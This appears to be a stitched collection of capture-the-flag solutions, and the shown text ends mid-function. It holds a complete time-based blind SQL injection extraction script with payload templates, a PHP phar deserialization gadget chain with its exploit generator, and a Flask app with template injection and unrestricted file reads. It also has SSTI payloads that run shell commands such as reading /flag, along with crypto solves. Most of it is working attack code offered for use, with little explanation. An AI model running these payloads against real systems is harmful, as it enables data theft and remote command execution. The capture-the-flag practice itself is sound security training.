import requests
import time
from urllib.parse import quote

# 目标网站基础URL
BASE_URL = "http://ctf.miaoaixuan.cn:32987"

# 学生姓名列表
STUDENTS = [
    "Ewoji", "BX", "Or", "Unjoke", "orange", "Min9", "Weixiao",
    "LinkStar", "shiu", "crazycat", "mowan", "lingzhu", "zmjjkk",
    "Simon", "jieni7", "Emoji", "life", "luke", "maotouying"
]


def debug_response(response, endpoint):
    """调试响应信息"""
    print(f"\n[DEBUG] {endpoint} 响应状态码: {response.status_code}")
    print(f"[DEBUG] 响应内容 (前200字符): {response.text[:200]}")
    print(f"[DEBUG] 完整URL: {response.url}")
    return response.text


def main():
    # 创建会话保持连接
    session = requests.Session()

    # 1. 重置挑战
    reset_url = f"{BASE_URL}/api/reset"
    reset_resp = session.get(reset_url)
    print(f"重置挑战: 状态码 {reset_resp.status_code}")

    print("开始签到流程...")
    start_time = time.time()

    # 2. 遍历每个学生进行签到
    for student in STUDENTS:
        print(f"\n处理学生: {student}")
        try:
            # 2.1 获取学生UUID
            uuid_url = f"{BASE_URL}/api/findUUidByName?name={quote(student)}"
            uuid_resp = session.get(uuid_url)
            student_uuid = uuid_resp.text.strip()

            if not student_uuid:
                print(f"  ❌ {student} UUID获取失败!")
                debug_response(uuid_resp, "findUUidByName")
                continue
            print(f"  ✅ UUID: {student_uuid}")

            # 2.2 获取学生课程名称
            course_url = f"{BASE_URL}/api/findUserCourse?name={quote(student)}"
            course_resp = session.get(course_url)
            course_name = course_resp.text.strip()

            if not course_name:
                print(f"  ❌ {student} 课程获取失败!")
                debug_response(course_resp, "findUserCourse")
                continue
            print(f"  ✅ 课程: {course_name}")

            # 2.3 获取课程UUID
            course_uuid_url = f"{BASE_URL}/api/findUUidByCourseName?name={quote(course_name)}"
            course_uuid_resp = session.get(course_uuid_url)
            course_uuid = course_uuid_resp.text.strip()

            if not course_uuid:
                print(f"  ❌ {student} 课程UUID获取失败!")
                debug_response(course_uuid_resp, "findUUidByCourseName")
                continue
            print(f"  ✅ 课程UUID: {course_uuid}")

            # 2.4 获取签到码
            sign_code_url = f"{BASE_URL}/api/getSignCodeByCourseUUID?courseUUID={course_uuid}"
            sign_code_resp = session.get(sign_code_url)
            sign_code = sign_code_resp.text.strip()

            if not sign_code:
                print(f"  ❌ {student} 签到码获取失败!")
                debug_response(sign_code_resp, "getSignCodeByCourseUUID")
                continue
            print(f"  ✅ 签到码: {sign_code}")

            # 2.5 提交签到 (使用表单数据)
            check_sign_url = f"{BASE_URL}/api/checkSign"
            payload = {
                "signCode": sign_code,
                "name": student,
                "courseUUID": course_uuid,
                "nameUUID": student_uuid,
                "distance": "0"
            }
            sign_resp = session.post(check_sign_url, data=payload)

            # 处理签到响应
            try:
                sign_data = sign_resp.json()
                if sign_data.get("success", False):
                    print(f"  ✅ {student} 签到成功!")
                else:
                    print(f"  ❌ {student} 签到失败! {sign_data.get('msg', '无错误信息')}")
            except:
                print(f"  ⚠️ {student} 签到响应: {sign_resp.text[:100]}")

        except Exception as e:
            print(f"  ❗ {student} 处理异常: {str(e)}")
            continue

    # 3. 获取flag
    elapsed = time.time() - start_time
    flag_url = f"{BASE_URL}/api/getFlag"
    flag_resp = session.get(flag_url)

    print("\n" + "=" * 50)
    print(f"签到流程完成! 耗时: {elapsed:.2f}秒")

    # 尝试解析JSON或直接显示文本
    try:
        flag_data = flag_resp.json()
        flag = flag_data.get("flag", "")
        if not flag:
            flag = flag_resp.text
    except:
        flag = flag_resp.text

    print(f"Flag: {flag}")
    print("=" * 50)


if __name__ == "__main__":
    main()

# coding:utf-8
import requests
import datetime
import time

"""
k控制着limit
i控制着substr
j控制着所猜字符的ascii

payload :
    单引号盲注：
        猜数据库长度：
        payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
        猜数据库名字：
        payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
        猜表名：
        payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
        猜列名：
        payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
        爆数据：
        payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)

    双引号盲注：
        猜数据库长度：
        payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
        猜数据库名字：
        payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
        猜表名：
        payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
        猜列名：
        payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
        爆数据：
        payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
"""

url = 'http://ctf.miaoaixuan.cn:33110'


# 所有数据库函数
def all_databases():
    # 第一步：获取数据库数量
    db_count = 0
    print("Determining number of databases...")

    for count in range(1, 20):  # 假设最多20个数据库
        payload = "?id=1'/**/and/**/if((select/**/count(schema_name)/**/from/**/information_schema.schemata)>%d,sleep(2),0)%%23" % (
                    count - 1)

        time1 = datetime.datetime.now()
        try:
            r = requests.get(url + payload, timeout=3)
        except requests.exceptions.Timeout:
            # 超时表示条件为真
            continue

        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            print(f"Database count > {count - 1}")
        else:
            db_count = count - 1
            print(f"Total databases: {db_count}")
            break

    if db_count == 0:
        print("Failed to determine database count, using default value 5")
        db_count = 5

    # 第二步：获取每个数据库名称
    databases = []
    print("\nExtracting database names...")

    for db_index in range(db_count):
        db_name = ''
        # 先获取当前数据库名称长度
        name_len = 0
        for length in range(1, 50):  # 数据库名最多50字符
            payload = "?id=1'/**/and/**/if(length((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/%d,1))>%d,sleep(2),0)%%23" % (
            db_index, length - 1)

            time1 = datetime.datetime.now()
            try:
                r = requests.get(url + payload, timeout=3)
            except requests.exceptions.Timeout:
                # 超时表示条件为真
                continue

            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                print(f"Database {db_index} length > {length - 1}")
            else:
                name_len = length - 1
                print(f"Database {db_index} length: {name_len}")
                break

        # 获取数据库名称
        if name_len > 0:
            for pos in range(1, name_len + 1):
                found = False
                for char_code in range(32, 127):  # 可打印ASCII字符
                    payload = "?id=1'/**/and/**/if(ascii(substr((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/%d,1),%d,1))=%d,sleep(2),0)%%23" % (
                        db_index, pos, char_code)

                    time1 = datetime.datetime.now()
                    try:
                        r = requests.get(url + payload, timeout=3)
                    except requests.exceptions.Timeout:
                        # 超时表示条件为真
                        db_name += chr(char_code)
                        print(f"Database {db_index}: {db_name}")
                        found = True
                        break

                    time2 = datetime.datetime.now()
                    sec = (time2 - time1).seconds
                    if sec >= 2:
                        db_name += chr(char_code)
                        print(f"Database {db_index}: {db_name}")
                        found = True
                        break

                if not found:
                    break

            if db_name:
                databases.append(db_name)
                print(f"Found database: {db_name}")

    print("\nAll databases:")
    for idx, db in enumerate(databases):
        print(f"{idx + 1}. {db}")

    return databases

def database_len():
    for i in range(1, 15):

        payload = "?id=1'/**/and/**/if(length(database())>%s,sleep(2),0)%%23" % i
        # payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)
    return i


def database_name(len):
    name = ''
    for i in range(1, len + 1):
        for j in '0123456789abcdefghijklmnopqrstuvwxyz':
            payload = "?id=1'/**/and/**/if(substr(database(),%d,1)='%s',sleep(3),1)%%23" % (i, j)
            # payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 3:
                name += j
                print(name)
                break
    print('database_name:', name)


def table_name(database):
    """
    获取指定数据库中的所有表名
    :param database: 数据库名称，如果为None则使用当前数据库
    :return: 表名列表
    """
    # 第一步：获取表数量
    table_count = 0
    condition = "table_schema=database()" if database is None else f"table_schema='{database}'"
    print(f"Determining number of tables in database: {database or 'current'}...")

    for count in range(1, 50):  # 假设最多50个表
        payload = f"?id=1'/**/and/**/if((select/**/count(table_name)/**/from/**/information_schema.tables/**/where/**/{condition})>{count - 1},sleep(2),0)%%23"

        time1 = datetime.datetime.now()
        try:
            r = requests.get(url + payload, timeout=3)
        except requests.exceptions.Timeout:
            # 超时表示条件为真
            continue

        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            print(f"Table count > {count - 1}")
        else:
            table_count = count - 1
            print(f"Total tables: {table_count}")
            break

    if table_count == 0:
        print("Failed to determine table count, using default value 10")
        table_count = 10

    # 第二步：获取每个表名称
    tables = []
    print("\nExtracting table names...")

    for table_index in range(table_count):
        tbl_name = ''
        # 先获取当前表名称长度
        name_len = 0
        for length in range(1, 50):  # 表名最多50字符
            payload = f"?id=1'/**/and/**/if(length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/{condition}/**/limit/**/{table_index},1))>{length - 1},sleep(2),0)%%23"

            time1 = datetime.datetime.now()
            try:
                r = requests.get(url + payload, timeout=3)
            except requests.exceptions.Timeout:
                # 超时表示条件为真
                continue

            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                print(f"Table {table_index} length > {length - 1}")
            else:
                name_len = length - 1
                print(f"Table {table_index} length: {name_len}")
                break

        # 获取表名称
        if name_len > 0:
            for pos in range(1, name_len + 1):
                found = False
                for char_code in range(32, 127):  # 可打印ASCII字符
                    payload = f"?id=1'/**/and/**/if(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/{condition}/**/limit/**/{table_index},1),{pos},1))={char_code},sleep(2),0)%%23"

                    time1 = datetime.datetime.now()
                    try:
                        r = requests.get(url + payload, timeout=3)
                    except requests.exceptions.Timeout:
                        # 超时表示条件为真
                        tbl_name += chr(char_code)
                        print(f"Table {table_index}: {tbl_name}")
                        found = True
                        break

                    time2 = datetime.datetime.now()
                    sec = (time2 - time1).seconds
                    if sec >= 2:
                        tbl_name += chr(char_code)
                        print(f"Table {table_index}: {tbl_name}")
                        found = True
                        break

                if not found:
                    break

            if tbl_name:
                tables.append(tbl_name)
                print(f"Found table: {tbl_name}")

    print("\nAll tables in database", database or "current")
    for idx, tbl in enumerate(tables):
        print(f"{idx + 1}. {tbl}")

    return tables


def colum_name(table_name):
	results = []  # 存储所有找到的列名
	for k in range(6):  # 尝试获取前6个列名
		column_name = ''  # 存储当前列名
		for i in range(1, 30):  # 每个列名最多30个字符
			found = False
			for j in range(32, 127):  # 可打印ASCII字符范围
				# 构造payload - 使用/**/代替所有空格
				payload = "?id=1'/**/and/**/if(ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='%s'/**/and/**/table_schema='security'/**/limit/**/%d,1),%d,1))=%d,/**/sleep(3),0)%%23" % (
					table_name, k, i, j)

				time1 = datetime.datetime.now()
				try:
					r = requests.get(url + payload, timeout=5)
				except requests.exceptions.Timeout:
					# 超时表示条件为真
					column_name += chr(j)
					print(f"Found char: {chr(j)} at position {i} for column {k}")
					found = True
					break

				time2 = datetime.datetime.now()
				sec = (time2 - time1).seconds
				if sec >= 3:
					column_name += chr(j)
					print(f"Found char: {chr(j)} at position {i} for column {k}")
					found = True
					break

			# 如果当前字符位置没有找到有效字符，结束当前列名
			if not found:
				break

		if column_name:
			results.append(column_name)
			print(f"Column {k}: {column_name}")

	print("\nAll columns in table", table_name)
	for idx, col in enumerate(results):
		print(f"{idx}: {col}")

	return results

# 获取表数据函数（基于回显判断）
# 获取表数据函数（基于直接回显判断）
def data(column, table):
    """
    获取指定表的列数据（带双重验证）
    :param column: 列名
    :param table: 表名
    :return: 数据字符串
    """
    results = []  # 存储所有记录
    for k in range(6):  # 尝试获取前6条记录
        record = ''  # 存储当前记录的值
        for i in range(1, 20):  # 每条记录最多20个字符
            candidates = []  # 存储候选字符
            verified_char = None  # 初始化为None，确保变量存在

            # 第一阶段：初步获取字符
            for j in range(32, 127):  # 可打印ASCII字符范围
                payload = "?id=1'/**/and/**/if(ascii(substr((select/**/%s/**/from/**/%s/**/limit/**/%d,1),%d,1))=%d,/**/sleep(2),0)%%23" % (
                    column, table, k, i, j)

                time1 = datetime.datetime.now()
                try:
                    r = requests.get(url + payload, timeout=5)
                except requests.exceptions.Timeout:
                    candidates.append(j)
                    continue

                time2 = datetime.datetime.now()
                sec = (time2 - time1).total_seconds()
                if sec >= 1.5:  # 宽松阈值
                    candidates.append(j)

            # 没有候选字符，结束当前记录
            if not candidates:
                print(f"⚠️ 位置 {i} 没有候选字符")
                break

            # 第二阶段：验证候选字符
            found_char = False
            for candidate in candidates:
                # 验证payload
                verify_payload = "?id=1'/**/and/**/if(ascii(substr((select/**/%s/**/from/**/%s/**/limit/**/%d,1),%d,1))=%d,/**/sleep(2),0)%%23" % (
                    column, table, k, i, candidate)

                time1 = datetime.datetime.now()
                try:
                    r = requests.get(url + verify_payload, timeout=5)
                except requests.exceptions.Timeout:
                    verified_char = candidate
                    found_char = True
                    break

                time2 = datetime.datetime.now()
                if (time2 - time1).total_seconds() >= 1.5:
                    verified_char = candidate
                    found_char = True
                    break

            # 如果没有找到有效字符
            if not found_char:
                print(f"⚠️ 位置 {i} 验证失败，候选字符: {[chr(c) for c in candidates]}")
                break

            # 添加到记录
            record += chr(verified_char)
            print(f"✅ 找到字符: {chr(verified_char)} 位置 {i} 记录 {k}")

        if record:
            # 最终验证整条记录
            verify_full_payload = "?id=1'/**/and/**/if('%s'=(select/**/%s/**/from/**/%s/**/limit/**/%d,1),/**/sleep(3),0)%%23" % (
                record, column, table, k)

            time1 = datetime.datetime.now()
            try:
                r = requests.get(url + verify_full_payload, timeout=6)
                time2 = datetime.datetime.now()
                if (time2 - time1).total_seconds() < 2.5:
                    print(f"⚠️ 记录验证失败: {record}")
                    continue
            except requests.exceptions.Timeout:
                pass

            results.append(record)
            print(f"✅✅ 记录 {k} 验证通过: {record}")
        else:
            print(f"❌ 未找到记录: 位置 {k}")

    # 组装结果
    all_data = "\n".join(results)
    print("\n验证通过的数据:")
    print(all_data)
    return all_data

if __name__ == '__main__':
    # 获取所有数据库名称
    #databases = all_databases()

    # 示例：获取第一个数据库的表名
    #if databases:
        #print(f"\nProcessing database: {databases[0]}")
    #len = database_len()
    # database_name(len)
    #table_name('ctf')
    #colum_name('flag')
    data('id', 'flag')

All databases:
1. ctf
2. information_schema
3. mysql
4. performance_schema
5. security
6. test

Validated columns in table flag
0: id
1: ctf
2: data

<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php'; 
ini_set('open_basedir','/var/www/html/'); 
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
} 
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?> 

<?php 
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"].$_SERVER["REMOTE_ADDR"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpg","png");
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("尼就不能发点图让窝康康吗!");</script>';
            return false; 
        } 
    } 
} 
?> 

 <?php
class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|filter|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|filter|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text =  base64_encode(file_get_contents($value));
        return $text;
    }
}
?> 

<?php
class C1e4r
{
    public $str;
    public function __construct()
    {
        $this->str = new Show();
    }
}

class Show
{
    public $str;
    public function __construct()
    {
        $this->str['str']=new Test();
    }
}
class Test
{
    public $params;
    public function __construct()
    {
        $this->params['source']="/var/www/html/f1ag.php";
    }
}

$phar =new Phar("JATO.phar");
$phar->startBuffering();
$phar->setStub("XXX<?php XXX __HALT_COMPILER(); ?>");
$a=new C1e4r();
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.11.13
Date: Tue, 12 Aug 2025 07:13:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9201
Connection: close

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import re
import subprocess
import requests
from flask import Flask, render_template, request, redirect, url_for, session, flash, jsonify, render_template_string
from werkzeug.security import generate_password_hash, check_password_hash
import sqlite3
import secrets
from datetime import datetime
import json

from api import get_ai_response as api_get_ai_response, get_ai_response_with_history, api_client


app = Flask(__name__)
app.secret_key = os.environ.get('FLASK_SECRET_KEY') or 'your-secret-key-here-change-in-production'

DB_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bai.db')

def init_db():
    conn = sqlite3.connect(DB_PATH)
    cursor = conn.cursor()
    
    cursor.execute('''
        CREATE TABLE IF NOT EXISTS users (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            username TEXT UNIQUE NOT NULL,
            password TEXT NOT NULL,
            role TEXT DEFAULT 'user',
            created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )
    ''')
    
    cursor.execute('''
        CREATE TABLE IF NOT EXISTS chat_history (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            user_id INTEGER,
            message TEXT,
            response TEXT,
            timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
            FOREIGN KEY (user_id) REFERENCES users (id)
        )
    ''')
    
    cursor.execute('DELETE FROM users')
    
    admin_password = generate_password_hash('1811753380bbbbbbb')
    cursor.execute('INSERT OR IGNORE INTO users (username, password, role) VALUES (?, ?, ?)',
                   ('admin', admin_password, 'admin'))
    
    user_password = generate_password_hash('password')
    cursor.execute('INSERT OR IGNORE INTO users (username, password, role) VALUES (?, ?, ?)',
                   ('user', user_password, 'user'))
    
    conn.commit()
    conn.close()

def get_ai_response(message, chat_history=None):
    try:
        if chat_history:
            formatted_history = []
            for msg, resp, _ in chat_history:
                formatted_history.append({"role": "user", "content": msg})
                formatted_history.append({"role": "assistant", "content": resp})
            
            response = get_ai_response_with_history(
                message=message,
                chat_history=formatted_history[-10:],  # 只保留最近5轮对话
                system_prompt="你是硅基流动AI助手。请用友好、专业的语气回答用户问题。"
            )
        else:
            response = api_get_ai_response(
                message=message,
                system_prompt="你是硅基流动AI助手。请用友好、专业的语气回答用户问题。"
            )
        
        return response
    except Exception as e:
        import logging
        logging.error(f"API调用出错: {e}")
        try:
            return api_get_ai_response(
                message=message,
                system_prompt="你是B-ai，一个智能助手。请用友好、专业的语气回答用户问题。回答要简洁明了，不超过200字。"
            )
        except Exception as e2:
            logging.error(f"二次API调用也失败: {e2}")
            return f"硅基流动API调用失败，请稍后再试。错误信息: {str(e2)[:100]}..."


@app.route('/')
def index():
    return render_template('index.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    flash('由于API流量过大，注册功能已关闭，但是已经存在的用户可以正常登录，请不必担心😓', 'error')
    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        
        conn = sqlite3.connect(DB_PATH)
        cursor = conn.cursor()
        cursor.execute('SELECT id, username, password, role FROM users WHERE username = ?', (username,))
        user = cursor.fetchone()
        conn.close()
        
        if user and check_password_hash(user[2], password):
            session['user_id'] = user[0]
            session['username'] = user[1]
            session['role'] = user[3]
            flash('登录成功！', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('用户名或密码错误', 'error')
    
    return render_template('login.html')

@app.route('/logout')
def logout():
    session.clear()
    flash('已退出登录', 'info')
    return redirect(url_for('index'))

announcement = "欢迎使用B-ai系统！我真的好想你"

@app.route('/dashboard')
def dashboard():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    theme = request.args.get('theme', '')
    lang = request.args.get('lang', 'zh')
    custom_msg = request.args.get('msg', '')
    
    welcome_msg = "欢迎使用B-ai系统！"
    
    if custom_msg:
        welcome_msg = f"欢迎使用B-ai系统！您的消息: {custom_msg}"

            
    if theme:
        welcome_msg = f"<span class=\"theme-{theme}\">{welcome_msg}</span>"
    
    global announcement
    rendered_announcement = render_template_string(announcement)
    return render_template('dashboard.html', welcome_msg=welcome_msg, announcement=rendered_announcement)

@app.route('/chat', methods=['GET', 'POST'])
def chat():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    if request.method == 'POST':
        message = request.form['message']
        if message:
            conn = sqlite3.connect(DB_PATH)
            cursor = conn.cursor()
            cursor.execute('SELECT message, response, timestamp FROM chat_history WHERE user_id = ? ORDER BY timestamp DESC LIMIT 10',
                           (session['user_id'],))
            recent_history = cursor.fetchall()
            conn.close()
            
            response = get_ai_response(message, recent_history)
            
            conn = sqlite3.connect(DB_PATH)
            cursor = conn.cursor()
            cursor.execute('INSERT INTO chat_history (user_id, message, response) VALUES (?, ?, ?)',
                           (session['user_id'], message, response))
            conn.commit()
            conn.close()
            
            return jsonify({'response': response})
    
    # 获取聊天历史
    conn = sqlite3.connect(DB_PATH)
    cursor = conn.cursor()
    cursor.execute('SELECT message, response, timestamp FROM chat_history WHERE user_id = ? ORDER BY timestamp DESC LIMIT 20',
        (session['user_id'],))
    chat_history = cursor.fetchall()
    conn.close()
    
    return render_template('chat.html', chat_history=chat_history)

@app.route('/api/status')
def api_status():
    if 'user_id' not in session:
        return jsonify({'error': '需要登录'}), 401
    
    try:
        status_info = api_client.get_model_info()
        return jsonify({
            'status': 'success',
            'data': status_info
        })
    except Exception as e:
        return jsonify({
            'status': 'error',
            'message': str(e)
        }), 500

@app.route('/admin', methods=['GET', 'POST'])
def admin():
    if 'user_id' not in session or session.get('role') != 'admin':
        flash('需要管理员权限', 'error')
        return redirect(url_for('dashboard'))
    global announcement
    if request.method == 'POST':
        announcement = request.form.get('announcement', '')
        flash('公告已更新', 'success')
    return render_template('admin.html', announcement=announcement)

@app.route('/file')
def read_file():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    filename = request.args.get('filename')
    if not filename:
        return "请提供文件名", 400
    
    try:
        with open(filename, 'r') as f:
            content = f.read()
        return content
    except Exception as e:
        return str(e), 404

@app.route('/ai_settings')
def ai_settings():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    
    return render_template('ai_settings.html')

@app.route('/kb_manage')
def kb_manage():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    return render_template('kb_manage.html')

@app.route('/admin/debug', methods=['POST'])
def admin_debug():
    if 'user_id' not in session or session.get('role') != 'admin':
        return jsonify({'error': '权限不足'}), 403
    
    command = request.form.get('command', '')
    if not command:
        return jsonify({'error': '命令不能为空'}), 400
    
    try:
        import ast
        allowed_chars = set('0123456789+-*/() .')
        if not all(c in allowed_chars for c in command):
            return jsonify({'error': '只允许基本数学运算'}), 400
            
        result = ast.literal_eval(command)
        return jsonify({'result': str(result)})
    except Exception as e:
        return jsonify({'error': '计算错误: ' + str(e)}), 500

if __name__ == '__main__':
    init_db()
    app.run(host='0.0.0.0', port=5000)

{{ config.__class__.__init__.__globals__.os.popen('id') }}

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('base64 /flag').read() }}

AEStream 用的是 AES-CTR，两个实例用相同 key 和 nonce (iv)，因此它们产生的是相同的 keystream（从计数器起始值开始）。

aes2.next() 做的事是 encrypt(seed)，所以 hint1 = keystream_block1 ⊕ seed（seed 已知为 "WelcometoHnusec!"）。

    因此 keystream_block1 = hint1 ⊕ seed。

hint2 = encrypt(seed')，而 seed' == hint1，所以 hint2 = keystream_block2 ⊕ seed'，从而 keystream_block2 = hint2 ⊕ hint1。

c = aes1.enc(flag)，而 aes1 的 keystream从同一位置开始，因此前两块 keystream 就是上面得到的 keystream_block1||keystream_block2。

把 c 的前 32 字节与 keystream_block1||keystream_block2 异或，得到被 PKCS#7 填充过的 flag，再去填充即可。

hint1 = b'E\xbbJ\xf21z\x1e\x9a\xbc\xfa=\xd6_\xdb\xd8\x05'
hint2 = b'\xd4Wrw[Wm\xb0\xa8x/\xbe\xa5\x18\x96!'
c     = b'Z\xb0S\xd2\nQ\x00\xde\xeb\xd31\x96H\x87\xdf\x10\xf0\xda\x0f\xf8f!\x7f&\x18\x8e\x1ed\xf6\xcfB('
seed  = b"WelcometoHnusec!"

def xor(a,b): return bytes(x^y for x,y in zip(a,b))

ks1 = xor(hint1, seed)
ks2 = xor(hint2, hint1)
keystream = ks1 + ks2

flag_padded = xor(c, keystream)
# 去 PKCS#7 填充得到明文 flag
from Crypto.Util.Padding import unpad
flag = unpad(flag_padded, 16)
print(flag)   # b'HnuCTF{08ab5d9d4a67}'

要点

    lcglcg 的 next() 打印出的 5 个 state1..state5 实际上是随机序列的 x3,x4,x5,x6,x7x3​,x4​,x5​,x6​,x7​（因为 state 初始化为 [flag1,flag2]，next() 第一次输出的是 x3x3​）。

    递推式为 xk+2=axk+bxk+1+c(modn)xk+2​=axk​+bxk+1​+c(modn)。

    已知 x3,x4,x5,x6,x7x3​,x4​,x5​,x6​,x7​（题目给的 5 个数），则对下列三条（用已知量）建立线性方程可以解出 a,b,ca,b,c：

        x5=ax3+bx4+cx5​=ax3​+bx4​+c

        x6=ax4+bx5+cx6​=ax4​+bx5​+c

        x7=ax5+bx6+cx7​=ax5​+bx6​+c
        （这是 3 个关于 a,b,ca,b,c 的线性方程，模素数 nn 下可以解）

    得到 a,b,ca,b,c 后，用

        x3=a⋅x1+b⋅x2+cx3​=a⋅x1​+b⋅x2​+c

        x4=a⋅x2+b⋅x3+cx4​=a⋅x2​+b⋅x3​+c
        两个方程（此时 a,b,c,x3,x4a,b,c,x3​,x4​ 已知）求出 x1,x2x1​,x2​ 即可（模 nn 求逆解线性方程）。

    x1,x2x1​,x2​ 就是 flag 的两半，把 long → bytes 再拼接并解码得到明文 flag。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Solve the LCG-like challenge and recover the flag.

from Crypto.Util.number import long_to_bytes
from typing import List, Tuple

# --- 已知量（来自 data.txt） ---
n = 68418566166680984437402703625272731553747296025693618590794298935258118726663
s3 = 66197113447963088569905807367422234136837311293400941177037029882448386180824  # state1 -> x3
s4 = 1465387879790401324576632645792207804205401344030211870332166065003856478480   # state2 -> x4
s5 = 53764457668278953523773982314074853588530337224043400110936112299018955656280  # state3 -> x5
s6 = 51641100893339483616947811876284043310380946599428458089977022678049235841106  # state4 -> x6
s7 = 8464735694068924961824955624743475238569731852998624945216392118570300325487   # state5 -> x7

# Put known outputs in a list for convenience: x3..x7
xs = [s3, s4, s5, s6, s7]

# --- 辅助函数：模逆、模加减乘 ---
def modinv(a: int, m: int) -> int:
    # 返回 a 在模 m 下的逆元（假定 m 为素数且 a % m != 0）
    a %= m
    # 使用扩展欧几里得
    def egcd(x, y):
        if y == 0:
            return (1, 0, x)
        u, v, g = egcd(y, x % y)
        return (v, u - (x // y) * v, g)
    u, v, g = egcd(a, m)
    if g != 1:
        raise ValueError("No modular inverse")
    return u % m

def mod_solve_3x3(A: List[List[int]], B: List[int], mod: int) -> List[int]:
    """
    在模 mod 下，用高斯消元解 3x3 线性方程组 A * x = B.
    A 是 3x3 的整型矩阵，B 是长度为 3 的向量。
    返回解向量 x（长度3）。
    """
    # 拷贝以防修改原数组
    M = [[A[i][j] % mod for j in range(3)] for i in range(3)]
    Y = [B[i] % mod for i in range(3)]

    # 高斯消元（行操作）——将矩阵化为上三角并同时操作 Y
    for col in range(3):
        # 找到 pivot（非零）
